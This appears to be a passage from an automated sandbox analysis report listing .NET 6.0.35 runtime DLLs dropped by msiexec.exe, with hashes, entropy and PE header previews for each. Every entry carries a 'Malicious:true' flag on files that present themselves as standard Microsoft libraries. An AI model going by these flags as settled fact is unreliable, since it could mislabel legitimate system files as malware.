                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.684716827535747
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5bn83gY2W25bWXYA6VFHRN7Mm2R9zza+Qjb:1ndlcFClDK9zM/
                                                                                                                                                                                                                                                                                                                                  MD5:CCA0BFF7447B36C3585BD58E7331553C
                                                                                                                                                                                                                                                                                                                                  SHA1:60F98F8F0E64CC99C3870ACDF6853305E95DB2D7
                                                                                                                                                                                                                                                                                                                                  SHA-256:B772B9323E9E0C1B1E30FADC067A972132A434DA35B7FBF94F83E3DFD7D18F5C
                                                                                                                                                                                                                                                                                                                                  SHA-512:640926BB6951D915F40372A4FA8F200304EA040ED6D066D9EBFF06C104AFEF52091CEA415574A20168B0F90EBB8C60E491E11DA311ACCCA4DCC16DF3F426B20A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j............"!..0.............~*... ........@.. ..............................7-....`.................................0*..K....@..(................)...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................`*......H........ ......................P ......................................P....].&`..9.wl....R....k.SI}iK.N. ..h...1F......4.Y....eI9.......i.;.L.hN...a.G....w6..0....Q.#...8. {.%....2Eh>8i]...aBSJB............v4.0.30319......`.......#~......8...#Strings....,.......#GUID...<.......#Blob......................3............................................................=.....).....h.....k...........#...........8.............................Q.....S.........................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Expressions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3857168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.688507729288586
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:NcJRCkV0qWhSxCKB+GuuYKfM21hDPX7dRVLTeeYjGt553P77zbr7jrgrr+69NHX6:GJRCBhSzBpzfl1mja52rr+ANHXUZ
                                                                                                                                                                                                                                                                                                                                  MD5:41FA254B55E24CEBCACF5076FC3029A5
                                                                                                                                                                                                                                                                                                                                  SHA1:772DF03395D545DCAD32AF8F842FBB5BC1D208F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:5FF8E5B5DE3AA34EC78E7242B4A79031C8193708DF7D558BAB940BC7AB9BF44F
                                                                                                                                                                                                                                                                                                                                  SHA-512:0DA185EE166679EE8F984D6319EB775C23E047FC064D42FB753B756464F95E336FFEF2537DEA09AEF2350F48C16CE1699A038C6E6EB4520A4492CF6A7E537B20
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........." .....F4..j................................................:.......;...`...@......@............... .......................................(........:..)...p:..b...w..T...............................................................H............text...(E4......F4................. ..`.data........`4......H4.............@....reloc...b...p:..d...N:.............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...E.x.p.r.e.s.s.i.o.n.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Parallel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):848680
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7973776393266006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:gTwW686EirtG6ywFx+6iYr9MRNAj14rjc6HqsXOnJcRVaeTz6tFe+sSc:gerswFx+6iUl4d+JcRpkFe+S
                                                                                                                                                                                                                                                                                                                                  MD5:E2CB15F2999A77A88DD9387E291F5642
                                                                                                                                                                                                                                                                                                                                  SHA1:8471EB6244175E636C8F8725E194955F046A8C38
                                                                                                                                                                                                                                                                                                                                  SHA-256:F025EBA4ACCD76656B7FC7ACFA35A2DA5FC22C03003EDFDC7769343B352E35FD
                                                                                                                                                                                                                                                                                                                                  SHA-512:C1D1A76FA934A74EB333CA69CFEBA23B4B68174EB0EB817BE81FC33831C980EF248444541AC97A13AFEC4E0714A2732D2DC399E2FE738C96905EE71A501E6D52
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....V...r............................................................`...@......@............... ..........................................8p......()......P...0...T...............................................................H............text....U.......V.................. ..`.data....X...p...Z...X..............@....reloc..P...........................@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...B.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...P.a.r.a.l.l.e.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...R.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):228616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.512443359566012
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RZIyoRf1vQ4cHZEAAJLX02JiReD2bY7i+I/4n148cJE87MZzZiqGM+3aTol2iYIv:Rfo91vQbHZtuz02gb8dn5cgZ9GXVICv
                                                                                                                                                                                                                                                                                                                                  MD5:0FD8A529D17BDEC60A3D941E5BEAC4FC
                                                                                                                                                                                                                                                                                                                                  SHA1:08FEAFAE32E7CCB861F34034599B53C368E6DA5C
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B1E83169F3865DB64C05C4CCC1C913E868E8B675B78B734923BDDE7E15ACE50
                                                                                                                                                                                                                                                                                                                                  SHA-512:8181FBB05721ECB49B97787A935E23F21770DCB8A7AA3C1FA554D8A096BD5F2F7A7D92BAB2443E5148173E832EDAD9B6D3006292BEFB2D3C69C7D7B5912B749E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...;.b..........." .........z...............................................p............`...@......@............... .......................................4.......T...)...`......h...T...............................................................H............text............................... ..`.data....n.......p..................@....reloc.......`.......J..............@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...D.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...Q.u.e.r.y.a.b.l.e...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...T.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):537896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.825953112999709
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:vLvJrD97IezrSLW5iIEobS5lEPsypTcenKskBvYvvyejaQO02KuAlz8J1J4+PDx8:TBrZ7IJ65iIET5mYIKsk8HQ8UASxW02
                                                                                                                                                                                                                                                                                                                                  MD5:DD7DD41A5EF369048A21784A73993E86
                                                                                                                                                                                                                                                                                                                                  SHA1:27A030563148509EBDC9E983E18885E621CDC26D
                                                                                                                                                                                                                                                                                                                                  SHA-256:F77B6D40B0B23614975F9124E337D7839194E2108D1C047D8DAE3F3F04ECD429
                                                                                                                                                                                                                                                                                                                                  SHA-512:C3823135C67A8492B507DCBE712D92821F5E896931C3B8C797FA9040E7D525842CABC0F196C0C5527F08D266A01EE3066B2F1E4930DC9EF833E6D85978736FFC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....p............" .....`................................................... ............`...@......@............... ..................................4...$...8F......()..............T...........................................................8...H............text...._.......`.................. ..`.data.......p.......b..............@....reloc..............................@..B............................................0.......................$.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........<.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...0.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...@.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...L.i.n.q...>.....F.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):173832
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.801666674835895
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:ft95NfdOt6imRtccnfS7h+y6fM/XkFPh/h/tmlTYrADS12UogJv8Xx:bdOtbXcn67h9oPh/hwOUD0v8h
                                                                                                                                                                                                                                                                                                                                  MD5:07F04C8E412E1BB8FF3D064D95C8AB4B
                                                                                                                                                                                                                                                                                                                                  SHA1:ABAE696A98F55D279925D82E9AB0246EDD8D6B1F
                                                                                                                                                                                                                                                                                                                                  SHA-256:F999676C4E7AB2CDC76C75CBED43B7D323BCDAF75669D6676DA398E013CDC013
                                                                                                                                                                                                                                                                                                                                  SHA-512:E519C50F8781E2C4A61C41356F79C735885493DC7B8A457BD3DAC19B51305A71A33E8D158F1887F60DF62517ADC852666CBF92FE2C2AC04B6AFFA02413A7534D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7............" .....P...,......................................................?.....`...@......@............... ..................................D...d<.......~...)..............T...........................................................H...H............text...(N.......P.................. ..`.data....'...`...(...R..............@....reloc...............z..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0...4.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...M.e.m.o.r.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...D.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...M.e.m.o.r.y...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):82184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.572349354143923
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536://dC1+VOgCV+QC9Dwp0wRlK0lB5YjbwRHUf7CN75q6+8J8iGpzWNRBtg:/FC1BgCV+z9DWK0z5YjbwGCnt+82bpyc
                                                                                                                                                                                                                                                                                                                                  MD5:E95B96BE68BED8BBE120B9E2AF1C655B
                                                                                                                                                                                                                                                                                                                                  SHA1:698CB970A23D5C3A749B9D1723EE7C7D9BC9381F
                                                                                                                                                                                                                                                                                                                                  SHA-256:932409C163BA3351DBBA8DB638CECBE9D0224C96142EF9B57459009866CB72F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:290D367F1A740F61F908459955CE625022E5291B4F888D2200258559C9153E70EFAC7DE94063A82CE992E4A281BD13E16FDB42E289843B9A69FB61D9D935BE93
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....m............" .........&...............................................@.......M....`...@......@............... .......................................*...........)...0......(...T...............................................................H............text............................... ..`.data....".......$..................@....reloc.......0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....D...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .e.x.t.e.n.s.i.o.n. .m.e.t.h.o.d.s. .f.o.r. .S.y.s.t.e.m...N.e.t...H.t.t.p...H.t.t.p.C.l.i.e.n.t. .a.n.d. .S.y.s.t.e.m...N.e.t...H.t.t.p...H.t.t.p.C.o.n.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1807120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.72377514511698
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:K+gRWsMsT/8SuPB0eDHxY6AnUIV2Et7+JSy6HJXwpkUrBc:K+gRHM6uPaeDHxY66UIV2PRaJ6a
                                                                                                                                                                                                                                                                                                                                  MD5:DE6AAE454E722E3F6338983C3E292B9C
                                                                                                                                                                                                                                                                                                                                  SHA1:4300C95F41916EFA603314963CA0E70FDB8F7E47
                                                                                                                                                                                                                                                                                                                                  SHA-256:6537558C53FC3F52C714D0B42CE52010D91C66BA040AEE1B57B58D1361AD075E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BEF4AE8B7D5CB732DE8DDB473E04E9B96597075EB2B20A2D812732450CFEA6313C271018CDE87F0DC47BEEAC7ED7B75D8915FDBEBA09A272D2C4C95D04F71F4D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...*B............" .....^...............................................................`...@......@............... ......................................dt.......j...)...`..(....u..T...............................................................H............text....].......^.................. ..`.data........p.......`..............@....reloc..(....`.......L..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):639152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.675826804479448
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SAaST6MSRsRshV3P1ZE7Ap0FTRNN3RdR9R5ijQz9Dl6Tm:SAgF02J8TrWkz36q
                                                                                                                                                                                                                                                                                                                                  MD5:42F40FB38738D1F24D4DFCAA2491A274
                                                                                                                                                                                                                                                                                                                                  SHA1:0009AE9396D79E06D03323D8EAD5A6240B34ECF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:9AD8BAE6EDEFBF35B8BBCE5DFCB5B058AA3B9A23F6836CDFE60601FD693EEB43
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0C367588287226B148F5F3E2498423AB56B06EAEC327CCE52CDDAF05B4988EA5F5DA839F7BC5B8864724A875780FB42A51347AE260305E4A2EA87245095275C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!............" ................................................................1.....`...@......@............... ..................................,.......p;.......(...........3..T...........................................................0...H............text............................... ..`.data...............................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........4.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):552248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.681552978241307
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:04YNveL6eFP1XxuNT5L2B2APiOLlbH5GAgZFd3qU:sa6A9XQ5FbP
                                                                                                                                                                                                                                                                                                                                  MD5:312C76ADC34A80AD00C01E036FE99893
                                                                                                                                                                                                                                                                                                                                  SHA1:A0E437A0CCAD78699EBC165E068182741C50C247
                                                                                                                                                                                                                                                                                                                                  SHA-256:558D751335D9ED63C6220F8B52DF1D5BE7138B844DD55A0ADBE0515EF3EEA9B1
                                                                                                                                                                                                                                                                                                                                  SHA-512:017BAEC878110FDDD6CD39AAD9E2DD7F7FB7ED274D85C82F81D8CDB2CE1B942A24E0DCFEAD50E2F27F6ECBCA8122CC7200201E8C105DC5E02F9BBE547FC14333
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f............" .........................................................`......l.....`...@......@............... ......................................x....@...D..8)...P..T....2..T...............................................................H............text...P........................... ..`.data...*z.......|..................@....reloc..T....P.......8..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):101136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.58531291273166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Nc8vDWisUZDWj5CkxyB0flOpiJvXVIb1C:rvtpz4JFIs
                                                                                                                                                                                                                                                                                                                                  MD5:1EA4AFF32FC894ADFAB80ACBA0911FFE
                                                                                                                                                                                                                                                                                                                                  SHA1:F7E6D194EB406373E7C51361C732CF14130DC0A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A4014CCD490E0BAD0A2521F5C0541037E945F8D06067777D90EC0AB1116579C
                                                                                                                                                                                                                                                                                                                                  SHA-512:B19735B5117625559BE7E9B720850B19052FE5F0910C5C311E1302C41A1D820D207B290671D23DF86F045FB693A8019EFA6752682DCA61DEC447C200C459E937
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....m)..........." .....8...(............................................................`...@......@............... ..................................8...X2..(....b...)..........X...T...........................................................8...H............text....7.......8.................. ..`.data....#...P...$...:..............@....reloc...............^..............@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):150792
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.573942436665297
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:dwGzr+JIgd5GfZOB7jG9LysLUYxPZLVXQ2Vf8ync7D+1TSapyLX:pr4Ia5GG7SLUY5fnp1+Db
                                                                                                                                                                                                                                                                                                                                  MD5:03F87B913BFE0EC24269251A9A6D0853
                                                                                                                                                                                                                                                                                                                                  SHA1:D2556A98ABC04D0DB2143B4AEB6BC80D97C51A83
                                                                                                                                                                                                                                                                                                                                  SHA-256:855A2B2D8AE418B3144D6A110DB09410A617D63A47B190EF51D66E018B5E68D5
                                                                                                                                                                                                                                                                                                                                  SHA-512:CAF1DA84B24C4EE8457248C60BCBB65247F3EBB31C789F270EB630B5D9305622724E6BC13411AA254F91471EA97DEFBE56A77E21E27B3F482923D35EBFB0F9C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....%............" .........0...............................................P......7.....`...@......@............... ..................................P...p;.......$...)...@..h...0...T...........................................................P...H............text............................... ..`.data...L*.......,..................@....reloc..h....@....... ..............@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.588702845265931
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
